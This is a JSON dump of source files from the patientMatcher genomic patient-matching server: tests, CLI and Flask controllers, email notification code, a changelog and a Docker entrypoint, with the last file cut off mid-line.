[ { "alpha_fraction": 0.7061118483543396, "alphanum_fraction": 0.7145643830299377, "avg_line_length": 45.60606002807617, "blob_id": "1370712491d9e7dc430f76f22858af34fb3762a9", "content_id": "1ffee9df62d00e81c607df2dc905eea551232705", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1538, "license_type": "permissive", "max_line_length": 93, "num_lines": 33, "path": "/tests/parse/test_parse_patient.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom patientMatcher.parse.patient import features_to_hpo, disorders_to_omim, mme_patient\n\ndef test_features_to_hpo_no_features():\n # Make sure the function returns [] if patient doesn't have HPO terms\n result = features_to_hpo(None)\n assert result == []\n\ndef test_disorders_to_omim_no_omim():\n # Make sure the function returns [] if patient doesn't have OMIM terms\n result = disorders_to_omim(None)\n assert result == []\n\ndef test_mme_patient_gene_symbol(gpx4_patients,database):\n # Test format a patient with gene symbol\n\n test_patient = gpx4_patients[0]\n # Before conversion patient's gene id is a gene symbol\n assert test_patient['genomicFeatures'][0]['gene']['id'].startswith('ENSG') is False\n mme_formatted_patient = mme_patient(test_patient, True) # Convert gene symbol to Ensembl\n # After conversion formatted patient's gene id should be an Ensembl id\n assert mme_formatted_patient['genomicFeatures'][0]['gene']['id'].startswith('ENSG')\n\n\ndef test_mme_patient_entrez_gene(entrez_gene_patient, database):\n #Test format a patient with entrez gene\n\n # Before conversion patient's gene id is an entrez gene ID\n assert entrez_gene_patient['genomicFeatures'][0]['gene']['id'] == \"3735\"\n mme_formatted_patient = mme_patient(entrez_gene_patient, True) # convert genes to Ensembl\n # After conversion formatted patient's gene id should be an Ensembl id\n assert mme_formatted_patient['genomicFeatures'][0]['gene']['id'].startswith('ENSG')\n" }, { "alpha_fraction": 0.808080792427063, "alphanum_fraction": 0.808080792427063, "avg_line_length": 8.899999618530273, "blob_id": "8fff7355c481440437a839dbbbd4b708a29d8104", "content_id": "89fea8de34dfd85ca0740e3ea098c68add0b8fc2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 99, "license_type": "permissive", "max_line_length": 22, "num_lines": 10, "path": "/requirements-dev.txt", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# testing:\nclick\npytest\nmongomock\npytest-cov\ncoveralls\n\n# server-related stuff\nrequests\nFlask-Mail\n" }, { "alpha_fraction": 0.6741405129432678, "alphanum_fraction": 0.695067286491394, "avg_line_length": 34.21052551269531, "blob_id": "e17cb73d3abcd91a040269775ddc0f8af5f529dd", "content_id": "b41a24c17193821d3332d7d97075735d2b217296", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1338, "license_type": "permissive", "max_line_length": 69, "num_lines": 38, "path": "/tests/utils/test_ensembl_rest_api.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: UTF-8 -*-\nimport tempfile\nfrom urllib.error import HTTPError\nfrom urllib.parse import urlencode\nfrom patientMatcher.utils import ensembl_rest_client as ensembl_api\n\ndef test_ping_ensemble_37():\n \"\"\"Test ping ensembl server containing human build 37\"\"\"\n client = ensembl_api.EnsemblRestApiClient()\n data = client.ping_server()\n assert data == {'ping':1}\n\ndef test_ping_ensemble_38():\n \"\"\"Test ping ensembl server containing human build 38\"\"\"\n client = ensembl_api.EnsemblRestApiClient(build='38')\n data = client.ping_server()\n assert data == {'ping':1}\n\ndef test_send_gene_request():\n \"\"\"Test send request with correct params and endpoint\"\"\"\n url = 'https://grch37.rest.ensembl.org/lookup/id/ENSG00000103591'\n client = ensembl_api.EnsemblRestApiClient()\n data = client.send_request(url)\n # get info for the ensembl gene\n assert data['display_name'] == 'AAGAB'\n\ndef test_send_request_wrong_url():\n \"\"\"Successful requests are tested by other tests in this file.\n This test will trigger errors instead.\n \"\"\"\n url = 'fakeyurl'\n client = ensembl_api.EnsemblRestApiClient()\n data = client.send_request(url)\n assert type(data) == ValueError\n\n url = 'https://grch37.rest.ensembl.org/fakeyurl'\n data = client.send_request(url)\n assert type(data) == HTTPError\n" }, { "alpha_fraction": 0.6837624907493591, "alphanum_fraction": 0.712279200553894, "avg_line_length": 46.948978424072266, "blob_id": "db97189e1f0fa938e54e4bde841e9c81d8dbb144", "content_id": "78cec800e73291db4a6cbdab2990955d40c995a4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4699, "license_type": "permissive", "max_line_length": 141, "num_lines": 98, "path": "/tests/match/test_pheno_matching.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom patientMatcher.match.phenotype_matcher import match, similarity_wrapper\nfrom patientMatcher.parse.patient import mme_patient\nfrom patientMatcher.resources import path_to_hpo_terms, path_to_phenotype_annotations\nfrom patient_similarity import HPO, Diseases, HPOIC, Patient\nfrom patient_similarity.__main__ import compare_patients\n\nPHENOTYPE_ROOT = 'HP:0000118'\n\ndef test_patient_similarity_wrapper():\n \"\"\"test the wrapper around this repo: https://github.com/buske/patient-similarity\"\"\"\n\n # Create the information-content functionality for the HPO\n hpo = HPO(path_to_hpo_terms, new_root=PHENOTYPE_ROOT)\n assert hpo\n diseases = Diseases(path_to_phenotype_annotations)\n assert diseases\n hpoic = HPOIC(hpo, diseases, orphanet=None, patients=False, use_disease_prevalence=False,\n use_phenotype_frequency=False, distribute_ic_to_leaves=False)\n assert hpoic\n\n query_p_terms = ['HP:0008058', 'HP:0007033', 'HP:0002194', 'HP:0002281'] # nervous system - related HPO terms\n\n # test wrapper by providing same terms for query patient and match patient:\n score = similarity_wrapper(hpoic=hpoic, hpo=hpo, max_hpo_score=1.0, hpo_terms_q=query_p_terms, hpo_terms_m=query_p_terms)\n # score should be something like 0.9999999999999999\n assert round(score,12) == 1\n\n match_p_terms = ['HP:0008058', 'HP:0007033', 'HP:0002194']\n\n # test wrapper by providing almost the same terms for query patient and match patient:\n related_pheno_score = similarity_wrapper(hpoic=hpoic, hpo=hpo, max_hpo_score=1.0, hpo_terms_q=query_p_terms, hpo_terms_m=match_p_terms)\n # similarity score should be lower, but still around 1\n assert round(related_pheno_score,2) < score\n assert related_pheno_score > 0.8\n\n # provide completely different HPO terms for matching patient\n match_p_terms = ['HP:0003002', 'HP:0000218'] # breast cancer and high palate phenotypes\n unrelated_pheno_score = similarity_wrapper(hpoic=hpoic, hpo=hpo, max_hpo_score=1.0, hpo_terms_q=query_p_terms, hpo_terms_m=match_p_terms)\n # then unrelated_pheno_score should be almost 0\n assert round(unrelated_pheno_score,2) == 0\n\n # but still a positive number\n assert unrelated_pheno_score >0\n\n\ndef test_phenotype_matching(gpx4_patients, database):\n \"\"\"test the algorithm that compares the phenotype of a query patient against the database\"\"\"\n\n # insert 2 test patients into test database\n for patient in gpx4_patients:\n database['patients'].insert_one(patient)\n assert len(list(database['patients'].find())) == 2\n\n query_patient = gpx4_patients[0]\n assert query_patient\n\n # this patient has HPO terms and OMIM diagnosis\n formatted_patient = mme_patient(query_patient)\n assert len(formatted_patient['features']) > 0\n assert len(formatted_patient['disorders']) > 0\n\n matches_HPO_OMIM = match(database, 0.75, formatted_patient['features'], formatted_patient['disorders'])\n assert len(matches_HPO_OMIM.keys()) == 2\n for key,value in matches_HPO_OMIM.items():\n assert 'patient_obj' in value\n assert value['pheno_score'] > 0\n\n features = formatted_patient['features']\n disorders = formatted_patient['disorders']\n # remove HPO terms from the query patient, test that the algorithm works anyway\n # because matching will use OMIM disorders\n formatted_patient['features'] = []\n matches_OMIM = match(database, 0.75, formatted_patient['features'], formatted_patient['disorders'])\n assert len(matches_OMIM.keys()) > 0 and len(matches_OMIM.keys()) < 50\n for key,value in matches_OMIM.items():\n assert 'patient_obj' in value\n assert value['pheno_score'] > 0\n\n # remove the OMIM diagnosis from patient object. The algorithm should work\n # but it shouldn't return any match\n formatted_patient['disorders'] = []\n matches_no_phenotypes = match(database, 0.75, formatted_patient['features'], formatted_patient['disorders'])\n assert len(matches_no_phenotypes.keys()) == 0\n\n # Add again features. The algorithm works again because HPO terms will be used\n formatted_patient['features'] = features\n matches_HPO = match(database, 0.75, formatted_patient['features'], formatted_patient['disorders'])\n assert len(matches_HPO.keys()) == 2\n for key,value in matches_HPO.items():\n assert 'patient_obj' in value\n assert value['pheno_score'] > 0\n\n # make sure that matches obtained when OMIM and HPO terms are present are more or equal than\n # when either of these phenotype terms is present by itself\n assert len(matches_HPO_OMIM.keys()) >= len(matches_OMIM.keys())\n assert len(matches_HPO_OMIM.keys()) >= len(matches_HPO.keys())\n" }, { "alpha_fraction": 0.6305732727050781, "alphanum_fraction": 0.6369426846504211, "avg_line_length": 21.428571701049805, "blob_id": "23b33ba61593f62aa56c0e8b9a84041c7824d875", "content_id": "200fe73b75ef23770a10725dc3b36e5a8e1a0031", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "permissive", "max_line_length": 49, "num_lines": 7, "path": "/tests/server/test_create_app.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\ndef test_create_app(mock_app):\n \"\"\"Tests the function that creates the app\"\"\"\n\n assert mock_app.client\n assert mock_app.db\n" }, { "alpha_fraction": 0.6896946430206299, "alphanum_fraction": 0.6919847130775452, "avg_line_length": 38.69696807861328, "blob_id": "a9c1d98163c63b2d5b257bf97e956747dc1610e0", "content_id": "90c2cfa5e10cd78a7f896171adbc3b318275ffe9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2620, "license_type": "permissive", "max_line_length": 124, "num_lines": 66, "path": "/patientMatcher/cli/remove.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport click\nfrom flask.cli import with_appcontext, current_app\n\nfrom patientMatcher.utils.delete import delete_by_query\n\[email protected]()\ndef remove():\n \"\"\"Remove items from database using the CLI\"\"\"\n pass\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=False, help=\"ID of the patient to be removed from database\")\[email protected]('-label', type=click.STRING, nargs=1, required=False, help=\"Label of the patient to be removed from database\")\[email protected]('-remove_matches/-leave_matches', default=False, help=\"Remove or leave on db matches triggered by patient\")\n@with_appcontext\ndef patient(id, label, remove_matches):\n \"\"\"Removing a patient from patientMatcher providing its ID\"\"\"\n\n if not id and not label:\n click.echo('Error: either ID and/or label should be provided to delete a patient.')\n raise click.Abort()\n\n if remove_matches and not id:\n click.echo('Please provide patient ID and not label to remove all its matches.')\n raise click.Abort()\n\n query = {}\n if id:\n query['_id'] = id\n if label:\n query['label'] = label\n\n n_removed = delete_by_query(query=query, mongo_db= current_app.db, mongo_collection='patients')\n click.echo('Number of patients removed from database:{}'.format(n_removed))\n\n if remove_matches:\n # this will remove ONLY matches where this patient was the query patient\n # NOT those where patient was among the matching results\n query = {'data.patient.id' : id}\n n_removed = delete_by_query(query=query, mongo_db= current_app.db, mongo_collection='matches')\n click.echo('Number of matches for this patient removed from database:{}'.format(n_removed))\n\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=True, help=\"ID of the client to be removed from database\")\n@with_appcontext\ndef client(id):\n \"\"\"Remove a client from database by providing its ID\"\"\"\n\n query = {'_id' : id}\n n_removed = delete_by_query(query=query, mongo_db= current_app.db, mongo_collection='clients')\n click.echo('Number of clients removed from database:{}'.format(n_removed))\n\n\[email protected]()\[email protected]('-id', type=click.STRING, nargs=1, required=True, help=\"ID of the node to be removed from database\")\n@with_appcontext\ndef node(id):\n \"\"\"Remove a node from database by providing its ID\"\"\"\n\n query = {'_id' : id}\n n_removed = delete_by_query(query=query, mongo_db= current_app.db, mongo_collection='nodes')\n click.echo('Number of nodes removed from database:{}'.format(n_removed))\n" }, { "alpha_fraction": 0.6408839821815491, "alphanum_fraction": 0.7099447250366211, "avg_line_length": 17.564102172851562, "blob_id": "3c8a65977ce3c99f229ef6c2521130d2bb6f87c0", "content_id": "1817706510598f7d291c7cb52472cd82807e7b68", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1448, "license_type": "permissive", "max_line_length": 96, "num_lines": 78, "path": "/CHANGELOG.md", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "## [2.2] - 2020-10-19\n\n### Added\n- Codeowners document\n\n### Fixed\n- Avoid pymongo-related deprecated code\n- Unblock pytest and mongomock dependencies\n\n\n## [2.1]\n\n### Modified\n- Open up metrics endpoint for any request (no token needed)\n\n### Fixed\n- Update HPO file name to reflect resource on compbio.charite.de/jenkins\n\n\n## [2.0] - 2019-11-17\n\n### Modified\n- Ensembl gene IDs to describe gene IDs\n- Allow matching when external patients have entrez gene IDs or HGNC symbols\n- Display contact email in notification emails\n- Save to database only matches with results or error messages\n\n\n## [1.4] - 2019-11-06\n\n### Modified\n- Allow gene search using ensembl gene IDs\n\n\n\n## [1.3] - 2019-10-31\n\n### Fixed\n- Handle better external matching errors\n- Fix a bug introduced in version 1.2.0 (missing patient id in results)\n\n\n\n## [1.2.1] - 2019-10-30\n\n### Modified\n- Remove Host from external request headers for compatibility issues\n\n\n\n## [1.2.0] - 2019-10-29\n\n### Added\n- Introduced SCORE_THRESHOLD parameter as a minimum patient score threshold for returned results\n\n### Modified\n- Command line returns app version\n\n\n\n## [1.1.1] - 2019-04-25\n\n### Modified\n- Fixed bug in phenotype matching when no OMIM or no HPO terms are available\n\n\n\n## [1.1.0] - 2019-04-25\n\n### Modified\n- patient-similarity against all patients in database if query patient has HPO term\n\n\n\n## [1.0.0] - 2019-04-18\n\n### Added\n- patient-similarity integration for phenotype scoring\n" }, { "alpha_fraction": 0.6731128692626953, "alphanum_fraction": 0.6756400465965271, "avg_line_length": 49.0054931640625, "blob_id": "b95fbb2fd0dfa8f38526fac180c263dd8654dab0", "content_id": "cef2f4497d0b7586cf48831db5b4c9fc8b670ea8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9101, "license_type": "permissive", "max_line_length": 140, "num_lines": 182, "path": "/patientMatcher/utils/notify.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport logging\nfrom flask_mail import Message\n\nLOG = logging.getLogger(__name__)\n\n\ndef notify_match_internal(database, match_obj, admin_email, mail, notify_complete):\n \"\"\"Send an email to patient contacts after an internal match\n\n Args:\n database(pymongo.database.Database): patientMatcher database\n match_obj(dict): an object containing both query patient(dict) and matching results(list)\n admin_email(str): email of the server admin\n mail(flask_mail.Mail): an email instance\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n \"\"\"\n # Internal matching can be triggered by a patient in the same database or by a patient on a connected node.\n # In the first case notify both querier contact and contacts in the result patients.\n # in the second case notify only contacts from patients in the results list.\n sender = admin_email\n patient_id = None\n patient_label = None\n results = None\n recipient = None\n email_subject = 'MatchMaker Exchange: new patient match available.'\n email_body = None\n\n # check if query patient already belongs to patientMatcher database:\n internal_patient = database['patients'].find_one({'_id':match_obj['data']['patient']['id']})\n if internal_patient:\n #If patient used for the search is in patientMatcher database, notify querier as well:\n patient_id = match_obj['data']['patient']['id']\n patient_label = match_obj['data']['patient'].get('label')\n recipient = match_obj['data']['patient']['contact']['href'][7:]\n email_body = active_match_email_body(patient_id=patient_id, match_results=match_obj['results'], patient_label=patient_label,\n external_match=False, notify_complete=notify_complete)\n LOG.info('Sending an internal match notification for query patient with ID:{0}. Patient contact: {1}'.format(patient_id, recipient))\n\n kwargs = dict(subject=email_subject, html=email_body, sender=sender, recipients=[recipient])\n message = Message(**kwargs)\n # send email using flask_mail\n try:\n mail.send(message)\n except Exception as err:\n LOG.error('An error occurred while sending an internal match notification: {}'.format(err))\n\n # Loop over the result patients and notify their contact about the matching with query patient\n for result in match_obj['results'][0]['patients']: #this list has only one element since there is only one internal node\n\n patient_id = result['patient']['id']\n\n # do not notify when patient in results is the same as the one used for query\n if internal_patient and internal_patient['_id'] == patient_id:\n continue\n\n patient_label = result['patient'].get('label')\n recipient = result['patient']['contact']['href'][7:]\n email_body = passive_match_email_body(patient_id, match_obj['data']['patient'], patient_label, notify_complete)\n LOG.info('Sending an internal match notification for match result with ID {}'.format(patient_id))\n\n kwargs = dict(subject=email_subject, html=email_body, sender=sender, recipients=[recipient])\n message = Message(**kwargs)\n # send email using flask_mail\n try:\n mail.send(message)\n except Exception as err:\n LOG.error('An error occurred while sending an internal match notification: {}'.format(err))\n\n\ndef notify_match_external(match_obj, admin_email, mail, notify_complete):\n \"\"\"Send an email to patients contacts to notify a match on external nodes\n\n Args:\n match_obj(dict): an object containing both query patient(dict) and matching results(list)\n admin_email(str): email of the server admin\n mail(flask_mail.Mail): an email instance\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n \"\"\"\n sender = admin_email\n patient_id = match_obj['data']['patient']['id']\n patient_label = match_obj['data']['patient'].get('label')\n recipient = match_obj['data']['patient']['contact']['href'][7:]\n email_subject = 'MatchMaker Exchange: new patient match available.'\n email_body = active_match_email_body(patient_id=patient_id, match_results=match_obj['results'], patient_label=patient_label,\n external_match=True, notify_complete=notify_complete)\n LOG.info('Sending an external match notification for query patient with ID {0}. Patient contact: {1}'.format(patient_id, recipient))\n\n kwargs = dict(subject=email_subject, html=email_body, sender=sender, recipients=[recipient])\n message = Message(**kwargs)\n # send email using flask_mail\n try:\n mail.send(message)\n except Exception as err:\n LOG.error('An error occurred while sending an external match notification: {}'.format(err))\n\n\ndef active_match_email_body(patient_id, match_results, patient_label=None, external_match=False, notify_complete=False):\n \"\"\"Returns the body message of the notification email when the patient was used as query patient\n\n Args:\n patient_id(str): the ID of the patient submitted by the MME user which will be notified\n match_results(list): a list of patients which match with the patient whose contact is going to be notified\n external_match(bool): True == match in connected nodes, False == match with other patients in database\n patient_label(str): the label of the patient submitted by the MME user which will be notified (not mandatory field)\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n\n Returns:\n html(str): the body message\n \"\"\"\n search_type = 'against the internal database of MatchMaker patients'\n if external_match:\n search_type = 'against external nodes connected to MatchMaker'\n\n html = \"\"\"\n ***This is an automated message, please do not reply to this email.***<br><br>\n <strong>MatchMaker Exchange patient matching notification:</strong><br><br>\n Patient with ID <strong>{0}</strong>, label <strong>{1}</strong>.\n This search returned these potential matches</strong>:<br>\n <strong>{2}</strong><br>\n You might directly contact the matching part using the address specified in patient's data or review matching\n results in the portal you used to submit your patient.\n <br><br>\n Kind regards,<br>\n The PatientMatcher team\n \"\"\".format(patient_id, patient_label, html_format(match_results, 0, notify_complete))\n\n return html\n\n\ndef passive_match_email_body(patient_id, matched_patient, patient_label=None, notify_complete=False):\n \"\"\"Returns the body message of the notification email when the patient was used as query patient\n\n Args:\n patient_id(str): the ID of the patient submitted by the MME user which will be notified\n matched_patient(dict): a patient object\n patient_label(str): the label of the patient submitted by the MME user which will be notified (not mandatory field)\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n\n Returns:\n html(str): the body message\n \"\"\"\n html = \"\"\"\n ***This is an automated message, please do not reply.***<br>\n <strong>MatchMaker Exchange patient matching notification:</strong><br><br>\n Patient with <strong>ID {0}</strong>,<strong> label {1}</strong> was recently returned as a match result\n in a search performed using a patient with these specifications:<br>\n <strong>{2}</strong><br>\n You might directly contact the matching part using the address specified in patient's data or review matching\n results in the portal you used to submit your patient.\n <br><br>\n Kind regards,<br>\n The PatientMatcher team\n \"\"\".format(patient_id, patient_label, html_format(matched_patient, 0, notify_complete))\n\n return html\n\n\ndef html_format(obj, indent=0, notify_complete=False):\n \"\"\"Formats one or more patient objects to a nice html string\n\n Args:\n obj(list): a list of patient objects or a patient object\n notify_complete(bool): set to False to NOT notify variants and phenotype terms by email\n \"\"\"\n if isinstance(obj, list): # a list pf match results\n htmls = []\n for k in obj:\n htmls.append(html_format(obj=k, indent=indent+1, notify_complete=notify_complete))\n\n return '[<div style=\"margin-left: %dem\">%s</div>]' % (indent, ',<br>'.join(htmls))\n\n if isinstance(obj, dict): # patient object\n htmls = []\n for k,v in obj.items():\n if notify_complete or k in ['node', 'patients', 'patient', 'contact', 'id', 'name', 'href', 'email', 'institution']:\n htmls.append(\"<span style='font-style: italic; color: #888'>%s</span>: %s\" % (k,html_format(obj=v,indent=indent+1,\n notify_complete=notify_complete)))\n\n return '{<div style=\"margin-left: %dem\">%s</div>}' % (indent, ',<br>'.join(htmls))\n\n return str(obj)\n" }, { "alpha_fraction": 0.6740080118179321, "alphanum_fraction": 0.6799510717391968, "avg_line_length": 34.09815979003906, "blob_id": "efa04cd60054cc6eefe4b231982952bd067fad5e", "content_id": "1ce59f900e69b5627fccb70421dcff7ab9f68a45", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5721, "license_type": "permissive", "max_line_length": 114, "num_lines": 163, "path": "/patientMatcher/server/controllers.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport logging\nfrom flask import jsonify\nfrom jsonschema import ValidationError\nfrom patientMatcher.constants import STATUS_CODES\nfrom patientMatcher.utils.stats import general_metrics\nfrom patientMatcher.utils.delete import delete_by_query\nfrom patientMatcher.utils.patient import patients\nfrom patientMatcher.parse.patient import json_patient, validate_api, mme_patient\nfrom patientMatcher.auth.auth import authorize\nfrom patientMatcher.match.handler import external_matcher\nfrom patientMatcher.__version__ import __version__\n\nLOG = logging.getLogger(__name__)\n\ndef heartbeat(disclaimer):\n \"\"\"Return a heartbeat as defined here:https://github.com/ga4gh/mme-apis/blob/master/heartbeat-api.md\"\"\"\n\n hbeat = {\n \"heartbeat\": {\n \"production\": True,\n \"version\": __version__,\n \"accept\": [\"application/vnd.ga4gh.matchmaker.v1.0+json\", \"application/vnd.ga4gh.matchmaker.v1.1+json\"]\n },\n \"disclaimer\": disclaimer,\n }\n return hbeat\n\n\ndef metrics(database):\n \"\"\"return database metrics\"\"\"\n db_metrics = general_metrics(database)\n return db_metrics\n\n\ndef get_nodes(database):\n \"\"\"Get all connected nodes as a list of objects with node_id and node_label as elements\"\"\"\n results = list(database['nodes'].find())\n nodes = []\n for node in results:\n nodes.append( { 'id': node['_id'], 'description': node['label']} )\n return nodes\n\n\ndef patient(database, patient_id):\n \"\"\"Return a mme-like patient from database by providing its ID\"\"\"\n query_patient = None\n query_result = list(patients(database, ids=[patient_id]))\n if query_result:\n query_patient = query_result[0]\n return query_patient\n\n\ndef match_external(database, query_patient, node=None):\n \"\"\"Trigger an external patient matching for a given patient object\"\"\"\n # trigger the matching and save the matching id to variable\n matching_obj = external_matcher(database, query_patient, node)\n # save matching object to database only if there are results or error messages\n if matching_obj and (matching_obj.get('has_matches') or matching_obj.get('errors')):\n database['matches'].insert_one(matching_obj)\n return matching_obj\n\n\ndef check_request(database, request):\n \"\"\"Check if request is valid, if it is return MME formatted patient\n Otherwise return error code.\n \"\"\"\n check_result = None\n\n # check that request is using a valid auth token\n if not authorize(database, request):\n LOG.info(\"Request is not authorized\")\n return 401\n\n try: # make sure request has valid json data\n request_json = request.get_json(force=True)\n except Exception as err:\n LOG.info(\"Json data in request is not valid:{}\".format(err))\n return 400\n\n try: # validate json data against MME API\n validate_api(json_obj=request_json, is_request=True)\n except Exception as err:\n LOG.info(\"Patient data does not conform to API:{}\".format(err))\n return 422\n\n formatted_patient = mme_patient(json_patient=request_json['patient'],\n convert_to_ensembl = True)\n return formatted_patient\n\n\ndef check_async_request(database, request):\n \"\"\"Check if an asynchronous request is valid.\n Basically json data must be valid and the query ID should be\n already present in async responses database collection\"\"\"\n\n data = None\n try: # Check if request contains valid data\n data = request.json\n LOG.info('Request data looks valid. Source is {}'.format(data.get('source')))\n except:\n LOG.error('Request data is not valid. Abort')\n return 400\n\n # check if query ID was previously saved into async responses collection\n query_id = data.get('query_id')\n if query_id:\n async_response = database['async_responses'].find_one({'query_id':query_id})\n LOG.info('Async response is {}'.format(async_response))\n if query_id is None or async_response is None:\n LOG.error('Async request not authorized. Abort')\n return 401\n\n resp = data.get('response')\n if resp is None:\n LOG.error(\"Async server did not provide any 'response' object\")\n return 400\n try: # validate json response (results)\n validate_api(json_obj=resp, is_request=False)\n except Exception as err:\n LOG.info(\"Patient data does not conform to API:{}\".format(err))\n return 422\n\n return data\n\n\ndef validate_response(matches):\n \"\"\"Validates patient matching results before sending them away in a response\"\"\"\n\n try: # validate json data against MME API\n validate_api(json_obj=matches, is_request=False)\n except ValidationError as err:\n LOG.info(\"Patient data does not conform to API:{}\".format(err))\n return 422\n return matches\n\n\ndef bad_request(error_code):\n \"\"\"Crete an automatic response based on custom error codes\"\"\"\n message = STATUS_CODES[error_code]['message']\n resp = jsonify(message)\n resp.status_code = error_code\n return resp\n\n\ndef delete_patient(database, patient_id):\n \"\"\"Remove a patient by ID\"\"\"\n message = ''\n\n # first delete all matches in database for this patient:\n query = {'data.patient.id' : patient_id}\n deleted = delete_by_query(query, database, 'matches')\n LOG.info('deleted {} matche/s triggered by this patient'.format(deleted))\n\n\n query = {'_id' : patient_id}\n deleted = delete_by_query(query, database, 'patients')\n message = {}\n if deleted == 1:\n message['message'] = 'Patient and its matches were successfully deleted from database'\n else:\n message['message'] = 'ERROR. Could not delete a patient with ID {} from database'.format(patient_id)\n return message\n" }, { "alpha_fraction": 0.663517415523529, "alphanum_fraction": 0.6649709343910217, "avg_line_length": 32.56097412109375, "blob_id": "5b838c10a774c2b6031d47cccd9f04c462cb812d", "content_id": "0588e5fb9659bc3b7fd51d901ddc677b60929c5d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1376, "license_type": "permissive", "max_line_length": 96, "num_lines": 41, "path": "/patientMatcher/server/__init__.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport os\nfrom pymongo import MongoClient\nimport logging\nfrom flask import Flask\nfrom flask_mail import Mail\nfrom . import views\n\nlogging.basicConfig(level=logging.INFO)\nLOG = logging.getLogger(__name__)\n\ndef create_app():\n app = None\n\n try:\n LOG.info('Configuring app from environment variable')\n app = Flask(__name__)\n app.config.from_envvar('PMATCHER_CONFIG')\n except:\n LOG.warning('Environment variable settings not found, configuring from instance file.')\n app_root=os.path.abspath(__file__).split('patientMatcher')[0]\n\n # check if config file exists under ../instance:\n instance_path = os.path.join(app_root,'patientMatcher', 'instance')\n if not os.path.isfile(os.path.join(instance_path,'config.py')): # running app from tests\n instance_path = os.path.join(app_root,'patientMatcher','patientMatcher','instance')\n\n app = Flask(__name__, instance_path=instance_path, instance_relative_config=True)\n app.config.from_pyfile('config.py')\n\n client = MongoClient(app.config['DB_URI'])\n app.client = client\n app.db = client[app.config['DB_NAME']]\n LOG.info('database connection info:{}'.format(app.db))\n\n if app.config.get('MAIL_SERVER'):\n mail = Mail(app)\n app.mail = mail\n\n app.register_blueprint(views.blueprint)\n return app\n" }, { "alpha_fraction": 0.6448140740394592, "alphanum_fraction": 0.6487280130386353, "avg_line_length": 31.967741012573242, "blob_id": "7f643805f6dacacbf7bcf1524e5012f88486b4b8", "content_id": "665c02d22d4491e085c88cce05190372796176e3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1022, "license_type": "permissive", "max_line_length": 111, "num_lines": 31, "path": "/docker/entrypoint.sh", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/bin/bash -e\n\nCURR_DIR=\"$( cd \"$( dirname \"${BASH_SOURCE[0]}\" )\" && pwd )\"\n\nif [[ -z $(which python) ]]; then\n . /opt/conda/etc/profile.d/conda.sh\n conda activate patientMatcher\nfi\n\n# ugly grep, but lets user mount custom `instance/config.py` into image\nDB_USERNAME=$(grep '^DB_USERNAME =' $CURR_DIR/../patientMatcher/instance/config.py | cut -f 3 -d' ' | tr -d \\')\nDB_PASSWORD=$(grep '^DB_PASSWORD =' $CURR_DIR/../patientMatcher/instance/config.py | cut -f 3 -d' ' | tr -d \\')\nDB_NAME=$(grep '^DB_NAME =' $CURR_DIR/../patientMatcher/instance/config.py | cut -f 3 -d' ' | tr -d \\')\n\nSETUP_JS=/root/setup_mongo.js\ncat > $SETUP_JS << EOF\nconn = new Mongo();\ndb = conn.getDB(\"$DB_NAME\");\ndb.disableFreeMonitoring();\ndb.createUser({user: \"$DB_USERNAME\", pwd: \"$DB_PASSWORD\", roles:[\"dbOwner\"]});\nEOF\n\nmongod --fork \\\n --pidfilepath $MONGO_PIDFILE \\\n --logpath $MONGO_LOGPATH --logappend\nmongo $SETUP_JS\n\npmatcher add demodata\npmatcher add client -id test_client -token test_token -url www.test-url.com\n\nexec \"$@\"\n" }, { "alpha_fraction": 0.6828193664550781, "alphanum_fraction": 0.6840780377388, "avg_line_length": 35.52873611450195, "blob_id": "e296b43634c7906576bed8fbaad30589f64a0cd4", "content_id": "7ed32d4480bb3f9755ca082035f9bee813980afe", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3178, "license_type": "permissive", "max_line_length": 118, "num_lines": 87, "path": "/patientMatcher/cli/commands.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport click\nimport pymongo\nfrom pymongo.errors import ConnectionFailure\nfrom flask.cli import FlaskGroup, with_appcontext, current_app\nfrom flask_mail import Message\nfrom patientMatcher.server import 